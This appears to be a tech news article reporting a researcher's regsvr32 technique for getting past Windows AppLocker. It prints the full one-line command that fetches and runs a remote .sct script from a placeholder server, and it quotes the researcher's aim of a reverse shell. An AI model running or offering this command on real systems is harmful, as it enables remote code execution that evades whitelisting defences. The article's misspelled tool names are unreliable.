Researcher Used Regsvr32 to Bypass Windows AppLocker



/ 2 years ago

windows

A security researcher has found a vulnerability in Windows that could allow hackers to install malicious software on a computer without the user’s knowledge. Casey Smith, a researcher from Colorado, discovered that regsrvr32 (regsrvr64 in 64-bit versions) – a whitelisted function in Windows, dating back to Windows 7 – can be manipulated to bypass the AppLocker security restrictions on installing programs.

“So, I have been working this out the last few days. I was trying solve a particular problem,” Smith wrote on his blog. “I needed a reverse shell on workstation locked down by AppLocker executable and script rules enforced.”

Smith’s solution to the problem looked like this:

regsvr32 /s /n /u /i:http://server/file.sct scrobj.dll

Effectively, he used a URL as a script, a function of regsvr that was not commonly known to exist.

“The amazing thing here is that regsvr32 is already proxy aware, uses TLS, follows redirects, etc… And… You guessed a signed, default MS binary. So, all you need to do is host your .sct file at a location you control,” added Smith.

The crux of Smith’s discovery is, by using regsrvr32/regsrvr64, someone can remotely execute code on a Windows machine without triggering AppLocker. While Microsoft is yet to patch the flaw, anyone concern about it can disable regsvr in either Windows Firewall or their own third-party firewall.

Topics: , , ,

Support eTeknix.com

By supporting eTeknix, you help us grow. And continue to bring you the latest news, reviews, and competitions. Follow us on Facebook and Twitter to keep up with the latest technology. Share your favourite articles, chat with the team and more. Also check out eTeknix YouTube, where you'll find our latest video reviews, event coverage and features in 4K!
eTeknix FacebookeTeknix TwittereTeknix Instagram

Check out our Latest Video

Speak Your Mind

Tell us what you're thinking...
and oh, if you want a pic to show with your comment, go get a gravatar!


Optimized with PageSpeed Ninja